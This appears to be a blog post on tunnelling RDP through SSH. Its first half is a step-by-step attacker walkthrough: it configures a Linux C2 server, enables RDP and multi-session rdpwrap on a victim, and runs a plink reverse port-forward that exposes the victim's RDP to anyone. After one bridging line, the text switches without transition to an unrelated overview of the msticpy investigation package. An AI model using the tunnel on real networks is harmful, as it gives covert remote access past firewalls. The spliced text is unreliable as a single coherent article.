Wednesday, June 19, 2019

How to access RDP over SSH tunnel


How to access RDP over SSH tunnel

Remote Desktop Protocol (RDP) helps to get a nice graphical connection to a remote computer. But it also help attackers, that compromised such computer, to get a connection to this remote computer. Usually, companies protect such non-exposed systems by firewall and NAT rules from inbound RDP attempts. But attackers know about it and found other ways to bypass it such as network tunneling and host-based port forwarding.
In this blog post I will show how to do RDP over SSH tunnel with plink, but first, lets just understand what it means to create a tunnel.

Network tunneling and port forwarding

Tunneling, also known as “port forwarding”, is the transmission of data for use only within private network through the public network. It allows us to transmit data from one network to another. It uses the process of encapsulation through which the private network communications are sent to the public networks.
It reminds VPN because VPN is based on the idea of tunneling but they are different from each other.

General overview for such attack

Let’s say our attacker succeeded to get a foothold on one computer (victim’s computer) of the internal network. The attacker will enable RDP on the machine, dump user’s credentials or create a new user and add it to a group with permissions for RDP connection.
The attacker has an external SSH server (Linux machine) and it creates a remote port forwarding for a generic port (“12345”) on the Linux machine from the victim’s computer on 127.0.0.1:3389.
Once the connection has been established, the attacker connects from anywhere with RDP to the Linux machine over port “12345” and it will be forwarded to127.0.0.1:3389 on the victim’s machine.
Now that we understand the general picture, let’s start the work.
We will need Linux machine that will be the C2 server, Windows 10 machine as the victim’s computer and other Windows system to connect with RDP to the Linux machine.
*If this is too much for you, the Linux machine can be replaced by SSH applications for Windows like FreeSSHD or BitVise but I found that Linux machine works smoothly.

Stage 1: Setting up Linux server for SSH

Run systemctl status ssh and make sure the SSH server is running:
SSH service is running
If it doesn’t, enable it like that (taken from here):
sudo apt update
sudo apt install openssh-server
One of our goals is to open generic listening port (“12345”) on the Linux machine for any connection. This will allow us to connect from anywhere.
In order to be able to do it, we need to make another small change.
Edit the file /etc/ssh/sshd_config and add the following line:
GatewayPorts=clientspecified
This line allow remote hosts to connect to ports forwarded for the client.
Our Linux server is ready with SSH enabled.

Stage 2: Enable RDP on the remote computer

There are many ways to enable RDP, I will show the straight forward way with GUI but don’t expect an attacker to do so :).
Open system properties by opening the run window (winkey + “R”), typesysdm.cpl, press Enter and go to theRemote tab. Or if you want to get it faster just typeSystemPropertiesRemote from the run window and press Enter.
Make sure the Allow remote connection to this computer is marked:
Go to “Select Users…” and add any user you want. This will provide it with remote desktop permissions.
In our case, we added a local user named “remote1”:
We have RDP enabled, there is another optional thing that we can do and it will enable multi sessions RDP connections. This will allow us to connect with RDP to the remote computer without interfering the current connected user.
In our case we used rdpwrap which is an open source library that allows it. We download it:
After we run the installation, we run the RDPConf to make sure that it is running:
If you are doing it on lab, make sure that you are able to connect to the computer with RDP before starting the tunnel.

Stage 3: Creating the tunnel

A common utility used to tunnel RDP sessions is PuTTY link, known as Plink. It can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. With this tool we will be able to create encrypted tunnels that allow RDP ports to communicate back to the Linux machine, the attacker command and control (C2) server.
Example for using it:
plink.exe <user>@<ip or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 0.0.0.0:12345:127.0.0.1:3389
  • -P - connect to a specific port (“22”, SSH in our case)
  • -2 - force use of protocol version 2
  • -4 - force use of IPv4
  • -T - disable pty allocation
  • -N - don’t start a shell/command (SSH-2 only)
  • -C - enable compression
  • -R - forward remote port to local address. In our case, we will connect to port 12345 and will be forward to 3389
Important:
  • The user is the user for the SSH connection, not for the RDP !
  • The IP is for the SSH server (Linux machine)
Notice that in our case we are doingremote port forwarding, there are two more kind of port forwarding: local and dynamic but I won’t talk about the different in this post.
On the victim’s system it will be like that:
We are using the user “newton” and its password to connect to SSH on the Linux machine.
To check that the port is open, we will go our Linux machine and run
netstat -ano | grep LIST
We can see that the port “12345” is open from anywhere (“0.0.0.0”):

Stage 4: Connecting to the tunnel

Everything is ready, we will take any Windows computer and connect with RDP to the Linux machine IP and the port “12345”:
The connection will be received by the Linux SSH server and redirect our connection to 127.0.0.1:3389 on the victim’s computer.

Analysis

If we will sniff the network on the victim’s computer, we will see an encrypted SSH communication and no clue for RDP:
On the victim’s computer we will see by the event viewer, event 4624 with logon type 10 that specify that a remote desktop connection occurred on the computer from 127.0.0.1:

This is good for cyber crime investigation


msticpy is a package of python tools intended to be used for security investigations and hunting (primarily in Jupyter notebooks). Most of the tools originated from code written in Jupyter notebooks which was tidied up and re-packaged into python modules. I’ve added some references to other blogs in theReferences section, where I describe some of these notebooks in more detail.

The goals of the package are twofold:
  1. Reduce the clutter of code in notebooks making them easier to use and read.
  2. Provide building-blocks for future notebooks to make authoring them simpler and quicker.
There are some side benefits from this:
  • The functions and classes are easier to test when extracted into standalone modules, so (hopefully) they are more robust.
  • The code is easier to document, and the functionality is more discoverable than having to wade through old notebooks and copy and paste the desired functions.
While much of the functionality is only useful in Jupyter notebooks (e.g. much of thenbtools sub-package), there are several modules that are usable in any python application - most of the modules in thesectools sub-package fall into this category.

msticpy is organized into three main sub-packages:
  • sectools - python security tools to help with data analysis or investigation. These are all focused on data transformation, data analysis or data enrichment.
  • nbtools - Jupyter-specific UI tools such as widgets and data display. These are mostly presentation-layer tools concentrating on how to view or interact with the data.
  • data - data interfaces and query library for log and alert APIs including Azure Sentinel/Log Analytics, Microsoft Graph Security API and Microsoft Defender Advanced Threat Protection (MDATP).
The package is still in an early preview mode so there are likely to be bugs, possible API changes and much is not yet optimized for performance. We welcome feedback, bug reports and suggestions for new or improved features as well as contributions directly to the package.

In this article I'll give a brief overview of the main components. This is intended as an overview of some of the features rather than a full user guide. Although the modules/functions/classes are documented at the API level, we are still missing more detailed user guidance. In future blogs I will drill down into some of the specific components to describe their use (and limitations) in more detail, which will help fill some of this gap. Some of the modules have user document notebooks, which are listed in the References section at the end of the document. The API documentation is available on mstipy ReadTheDocs.

Request for Comments


We would really appreciate suggestions for future or better features. You can add these in comments to this doc or directly as issues on the msticpy GitHub.

Installing


The package requires Python 3.6 or later (seeSupported Platforms for more details).
pip install msticpy
or for the latest dev build (although usually we publish direct to PyPi)
A conda recipe and package is in the works but not yet available.
Installing the package will also install dependencies if required versions of these are not already installed. If you are installing into an environment where you are using some of these dependencies (especially if you are using conflicting versions), you should to create a python or conda virtual environment and use your notebooks from within that.

Security Tools Sub-package - sectools


This sub-package contains several modules helpful for working on security investigations and hunting. These are mostly data processing modules and classes and usually not restricted to use in a Jupyter/IPython environment (some of the modules have a visualization component that may not work outside a notebook environment).

base64unpack
This is a Base64 and archive (gz, zip, tar) extractor intended to help decode obfuscated attack command lines and http request strings. Input can either be a single string or a specified column of a pandas dataframe. The module will try to identify any base64 encoded strings and decode them. If the result of a decoding looks like one of the supported archive types, it will try to unpack the contents. The results of each decode/unpack are rechecked for further base64 content and it will recurse down up to 20 levels (the default can be overridden, but if you need more than 20 levels, there is probably something wrong!). Output is to a decoded string (for single string input) or a DataFrame (for dataframe input).Base64unpack.png

iocextract
This uses a set of built-in regular expressions to look for Indicator of Compromise (IoC) patterns. Input can be a single string or a pandas dataframe with one or more columns specified as input. You can add additional patterns and override built-in patterns.
The following types are built-in: IPv4 and IPv6, URLs, DNS domains, Hashes (MD5, SHA1, SHA256), Windows file paths and Linux file paths (this latter regex is kind of noisy because a legal linux file path can have almost any character). The two path regexes are not run by default.

Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).ioc_extract.png

vtlookup
Wrapper class around Virus Total API. Input can be a single IoC observable or a pandas DataFrame containing multiple observables. Processing requires a Virus Total account and API key and processing performance is limited to the number of requests per minute for the account type that you have. For example a VirusTotal free account is limited to 4 requests per minute. Supported IoC types are: Filehash (MD5, SHA1, SHA256), URL, DNS Domain, IPv4 Address.vt_lookup.png

geoip
Geographic location lookup for IP addresses is implemented as generic class with support for different data providers. The shipped module has two data providers:
Both services offer a free tier for non-commercial use. However, a paid tier will normally get you more accuracy, more detail and a higher throughput rate. Maxmind geolite uses a downloadable database, while IPStack is an online lookup (an account and API key are required).

The following screen shot shows both the use of the GeoIP lookup classes and map display with another msticpy module using folium (a python package using leaflet.js)geo_ip.png

eventcluster
This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.
The module contains functions to generate clusterable features from string data. For example, an administration command that does some maintenance on thousands of servers with a commandline such as:
install-update -hostname {host.fqdn} -tmp:/tmp/{some_GUID}/rollback
These repetitions can be collapsed into a single cluster pattern by ignoring the character values in the string and using delimiters or tokens to group the values.
This module uses an unsupervised learning module implemented using SciKit Learn DBScan.event_cluster.png

outliers
Similar to the eventcluster module but a little bit more experimental (read 'less tested'). It uses SciKit Learn Isolation Forest to identify outlier events in a single data set or using one data set as training data and another on which to predict outliers.

auditdextract
Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it will re-assemble the process command line arguments into a single string).

The following figures shows examples of raw audit messages and converted messages (these are two different event sets, so don’t show the same messages).auditd_raw.png

auditd_processed.png


Notebook tools sub-package - nbtools


This is a collection of display and utility modules designed to make working with security data in Jupyter notebooks quicker and easier.
  • nbwidgets - groups common functionality such as list pickers, time boundary settings, saving and retrieving environment variables into a single line callable command. In most cases these are simple wrappers and collections of the standard IPyWidgets.
  • nbdisplay - functions that implement common display of things like alerts, events in a slightly prettier and more consumable way than print().

 

nbwidgets


Query time selector

query_time_widget.png
Session browser

session_browser.png

Alert browser
alert_selector.png

nbdisplay


Event timeline

event_timeline.png

Logon display

logon_display.png

Process Tree

process_tree.png

Data sub-package - data


Some of these components are currently part of the nbtools sub-package but will be migrated to the data sub-package.

Parameterized query manager

This is a collection of modules that includes a set of commonly used queries and can be supplemented by user-defined queries supplied in yaml files. The purpose of these is to give you quick access to commonly used-queries in a way that allows easy substitution of parameter values such as date range, host name, account name, etc. The package current supports Kusto query language (KQL) queries targeted at Log Analytics and OData queries targeted at Microsoft Graph Security API. We are building driver modules to work with Microsoft Defender Advanced Threat Protection API and, in principle could be extended to cover queries expresses as a simple string expression. The architecture and yaml format was inspired by the Intake package – although some of the parameter substitution gymnastics meant that I was not able to use this package directly.

Sample query definition

yaml_query_definition.png

Query provider setup

query_provider_setup.png

Running a query

running_query.png

Note: the parameters for the query are auto-extracted from the query_times date widget object.

Other Modules


security_alert and security_event
These are encapsulation classes for alerts and events. Each has a standard 'entities' property reflecting the entities found in the alert or event. These can also be used as meta-parameters for many of the queries. For example, the query:
qry.list_host_logons(query_times, alert)
will extract the value for the hostname query parameter from the alert.

entityschema
This module implements entity classes (e.g. Host, Account, IPAddress, etc.) used in Log Analytics alerts and in many of these modules. Each entity encapsulates one or more properties related to the entity. This example shows a Linux alert with the related entities.entity_view.png

To-Do Items


Some of the items on our to-do list are shown below. However, other things requested by popular demand or contributed by others can certainly change this.
  • Create generic Threat Intel lookup interface supporting multiple providers.
  • Add additional modules for host-to-ip and ip-to-host resolution.
  • Add syslog queries, processing and visualizations.
  • Add network queries, processing and visualizations.
  • Add additional notebooks to document use of the tools.

Supported Platforms and Packages


  • msticpy is OS-independent
  • Requires Python 3.6 or later
  • Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing
  • The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois

Contributing to msticpy


msticpy is intentionally an open source package so that it is available to be used as-is or in modified form by anyone who wants to. We also welcome contributions – whether these are whole features, extensions of existing features, bug-fixes or additional documentation.

I’m a little finicky about code hygiene so I would (politely) ask the following for potential contributors:
  • Include doc comments in all modules, classes, public functions and public methods. Please use numpy docstring standard for consistency and to allow our auto-documentation to work well.
  • We are converting to Black code formatting throughout the project. This will happen whether you format your code like this or not. 😊
  • Type annotations are a great thing. History and I will thank you for adding type annotations. See this section of the docs for more information.
  • We write unit tests using Pythonunitest format but run these withpytest. Please add unit tests for any substantial PRs – and please make sure that the existing unit tests complete successfully.
  • Linters and other stuff. Committed branches will kick of tests and linting in the Azure build pipeline. Many of these are none-breaking (i.e. your build will complete with warnings) but please try to avoid introducing any new warnings (I’m having a hard-enough time fixing my own warnings!). Using pylint,prospectormypy and pydocstyle is a good minimum combination.